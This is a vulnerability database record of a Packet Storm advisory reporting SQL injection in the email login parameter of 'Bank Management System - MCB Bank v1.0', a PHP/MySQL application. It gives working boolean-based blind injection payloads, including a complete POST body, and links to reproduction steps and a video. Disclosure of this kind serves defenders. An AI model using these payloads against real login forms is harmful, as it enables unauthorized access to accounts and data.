{"id": "PACKETSTORM:166149", "vendorId": null, "type": "packetstorm", "bulletinFamily": "exploit", "title": "Bank Management System 1.0 SQL Injection", "description": "", "published": "2022-02-25T00:00:00", "modified": "2022-02-25T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "cvss2": {}, "cvss3": {}, "href": "https://packetstormsecurity.com/files/166149/Bank-Management-System-1.0-SQL-Injection.html", "reporter": "nu11secur1ty", "references": [], "cvelist": [], "immutableFields": [], "lastseen": "2022-02-25T15:09:08", "viewCount": 91, "enchantments": {"score": {"value": -0.1, "vector": "NONE"}, "vulnersScore": -0.1}, "_state": {"dependencies": 1646392271}, "_internal": {}, "sourceHref": "https://packetstormsecurity.com/files/download/166149/bms10-sql.txt", "sourceData": "`# Title: Bank Management System - MCB Bank v1.0 - SQLi \n# Author: nu11secur1ty \n# Date: 02.25.2022 \n# Vendor: https://www.campcodes.com/projects/php/ by: Tariq Fareeds \n# Software: https://www.campcodes.com/projects/php/bank-management-system-in-php-mysql-free-download/ \n# Reference: https://github.com/nu11secur1ty/CVE-nu11secur1ty/edit/main/vendors/campcodes.com/Bank-Management-System \n \n \n## Description: \nThe email parameter from Bank Management System - MCB Bank v1.0 \nappears to be vulnerable to SQL injection attacks. \nThe payloads 30735302' or 9098=9098-- and 41995976' or 3071=3078-- \nwere each submitted in the email parameter. \nThese two requests resulted in different responses, indicating that \nthe input is being incorporated into a SQL query in an unsafe way. \nWARNING: If this is in some external domain, or some subdomain \nredirection, or internal whatever, this will be extremely dangerous! \nStatus: CRITICAL \n \n \n[+] Payloads: \n \n```mysql \n--- \nParameter: email (POST) \nType: boolean-based blind \nTitle: OR boolean-based blind - WHERE or HAVING clause \nPayload: email=-9337' OR 4870=4870-- Cgzq&password=q7A!t8j!H2&cashierLogin= \n--- \n \n``` \n## Reproduce: \n[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/edit/main/vendors/campcodes.com/Bank-Management-System) \n \n## Proof and Exploit: \n[href](https://streamable.com/hvaaiu) \n \n`\n"}